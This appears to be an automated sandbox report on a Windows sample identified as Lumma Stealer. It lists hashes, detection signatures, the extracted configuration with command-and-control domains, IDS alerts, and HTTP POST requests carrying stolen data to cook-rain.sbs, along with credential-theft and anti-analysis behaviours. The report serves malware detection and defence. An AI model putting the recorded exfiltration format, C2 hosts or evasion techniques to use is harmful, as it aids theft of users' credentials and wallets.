
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1560145
MD5: 02fc2c82de8b775d97a32a39e1d34960
SHA1: 74496749c3f724136f259865d542221a22eac880
SHA256: 3231ef2658fb47a9a80f3ea5238ff1ed3afd67384a55335e9bce3660adf6b4f6
Tags: exe user-Bitsight

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 7748 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 02FC2C82DE8B775D97A32A39E1D34960)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["processhol.sbs", "3xp3cts1aim.sbs", "p10tgrace.sbs", "peepburry828.sbs", "p3ar11fter.sbs"], "Build id": "LOGS11--LiveTraffic"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: file.exe PID: 7748 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: file.exe PID: 7748 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: file.exe PID: 7748 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-21T13:10:14.843348+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49706 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:16.921833+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49712 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:19.305479+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49718 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:21.683352+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49724 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:24.050016+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49730 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:26.474644+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49736 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:28.989608+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49744 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:33.166293+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49762 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:15.563581+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.10 | 49706 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:17.633811+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.10 | 49712 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:15.563581+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.10 | 49706 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:17.633811+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.10 | 49712 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:14.843348+0100 | 2057731 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 49706 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:16.921833+0100 | 2057731 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 49712 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:19.305479+0100 | 2057731 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 49718 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:21.683352+0100 | 2057731 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 49724 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:24.050016+0100 | 2057731 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 49730 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:26.474644+0100 | 2057731 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 49736 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:28.989608+0100 | 2057731 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 49744 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:33.166293+0100 | 2057731 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 49762 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:13.209048+0100 | 2057730 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 57797 | 1.1.1.1 | 53 | UDP
2024-11-21T13:10:20.231641+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49718 | 188.114.97.3 | 443 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: https://cook-rain.sbs/apiMl | Avira URL Cloud: Label: malware
Source: https://cook-rain.sbs/api:n | Avira URL Cloud: Label: malware
Source: https://cook-rain.sbs/api) | Avira URL Cloud: Label: malware
Source: https://cook-rain.sbs/P | Avira URL Cloud: Label: malware
Source: file.exe.7748.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["processhol.sbs", "3xp3cts1aim.sbs", "p10tgrace.sbs", "peepburry828.sbs", "p3ar11fter.sbs"], "Build id": "LOGS11--LiveTraffic"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp | String decryptor: p3ar11fter.sbs
Source: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp | String decryptor: 3xp3cts1aim.sbs
Source: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp | String decryptor: peepburry828.sbs
Source: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp | String decryptor: p10tgrace.sbs
Source: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp | String decryptor: processhol.sbs
Source: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49724 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49744 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx] | 0_2_00354800
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h | 0_2_00371160
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+edx+4B5D9729h] | 0_2_0033CA6A
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx-05h] | 0_2_0033BDB0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov esi, edx | 0_2_00357E50
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-69h] | 0_2_00357E50
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov byte ptr [eax], bl | 0_2_0033CEF5
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-532F9054h] | 0_2_0033A874
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h] | 0_2_00333060
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov ebp, dword ptr [ecx+esi*4-000009BCh] | 0_2_00339150
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+000011E4h] | 0_2_00355150
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then jmp eax | 0_2_00348940
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edi, word ptr [edi+ecx*4] | 0_2_00337BB0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+34h] | 0_2_00337BB0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 0_2_00337BB0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 1B6183F2h | 0_2_0036BF10
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [esi+edi] | 0_2_00331F50
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edi, byte ptr [esp+esi+04h] | 0_2_0036BFC0

Networking

Source: Network traffic | Suricata IDS: 2057730 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs) : 192.168.2.10:57797 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.10:49706 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.10:49718 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.10:49724 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.10:49736 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.10:49712 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.10:49744 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.10:49730 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.10:49762 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49706 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49706 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:49712 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49712 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.10:49718 -> 188.114.97.3:443
Source: Malware configuration extractor | URLs: processhol.sbs
Source: Malware configuration extractor | URLs: 3xp3cts1aim.sbs
Source: Malware configuration extractor | URLs: p10tgrace.sbs
Source: Malware configuration extractor | URLs: peepburry828.sbs
Source: Malware configuration extractor | URLs: p3ar11fter.sbs
Source: Joe Sandbox View | IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49706 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49718 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49724 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49736 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49712 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49744 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49730 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49762 -> 188.114.97.3:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: cook-rain.sbs
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: cook-rain.sbs
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=AVORIOJXV765HT2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12835 Host: cook-rain.sbs
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=92XN0U0NYXL5IDP46 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15074 Host: cook-rain.sbs
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=KOV1MUE2Z06Q37QAMKS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20448 Host: cook-rain.sbs
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=YK33R37UURU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1197 Host: cook-rain.sbs
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=YSONZWT4DXTKH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 585323 Host: cook-rain.sbs
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: cook-rain.sbs
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: cook-rain.sbs
Source: file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.1520903809.0000000000F46000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.c
Source: file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.1443482290.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
Source: file.exe, 00000000.00000003.1443519497.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1466794753.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta
Source: file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.1443519497.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1466794753.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com
Source: file.exe, 00000000.00000003.1443482290.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
Source: file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1484354122.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1520806713.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1546918977.0000000000F70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cook-rain.sbs/
Source: file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cook-rain.sbs/P
Source: file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cook-rain.sbs/api
Source: file.exe, 00000000.00000003.1420595420.0000000000F74000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cook-rain.sbs/api)
Source: file.exe, 00000000.00000002.1546857241.0000000000F51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cook-rain.sbs/api:n
Source: file.exe, 00000000.00000003.1520903809.0000000000F51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cook-rain.sbs/apiMl
Source: file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cook-rain.sbs/apiY
Source: file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.1443482290.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000003.1421874521.00000000059E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.1421874521.00000000059E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.1443519497.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1466794753.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64
Source: file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.1443482290.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr
Source: file.exe, 00000000.00000003.1421874521.00000000059E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
Source: file.exe, 00000000.00000003.1421874521.00000000059E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
Source: file.exe, 00000000.00000003.1421874521.00000000059E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000003.1421874521.00000000059E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.1421874521.00000000059E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
